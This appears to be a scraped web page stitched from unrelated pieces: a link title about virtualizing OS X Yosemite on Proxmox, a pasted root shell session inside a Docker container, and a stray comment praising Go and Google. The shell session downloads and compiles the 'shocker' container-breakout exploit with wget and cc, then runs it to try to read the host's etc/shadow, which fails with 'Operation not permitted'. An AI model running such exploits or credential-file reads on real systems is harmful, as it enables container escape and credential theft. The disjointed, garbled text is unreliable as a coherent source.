Virtualizing OS X Yosemite on Proxmox
blog.will3942.com1 pointsby kvmosx0 comments
root@377a6f4ab0a4:/# history
10 wget http://stealth.openwall.net/xSports/shocker.c
11 cc -Wall -std=c99 -O2 shocker.c -static
12 apt-get install build-essential
13 cc -Wall -std=c99 -O2 shocker.c -static
14 cc -Wall -std=c99 -O2 shocker.c -static -Wno-unused-result
15 ls
16 ./shocker
17 shocker
18 nano a.out
19 cat a.out
20 ./a.out
21 history
root@377a6f4ab0a4:/# ./a.out
[***] docker VMM-container breakout Po(C) 2014
[***]
[***] The tea from the 90's kicks your sekurity again. [***]
[***] If you have pending sec consulting, I'll happily [***]
[***] forward to my friends who drink secury-tea too! [***]
<enter>
[*] Resolving 'etc/shadow'
[-] open_by_handle_at: Operation not permitted
root@377a6f4ab0a4:/# uname -r
3.14.1-tinycore64
And yet with Go there is more use of it for CLI apps and web apps. Adding mobile to that equation just makes it even more complete.
Good job Google.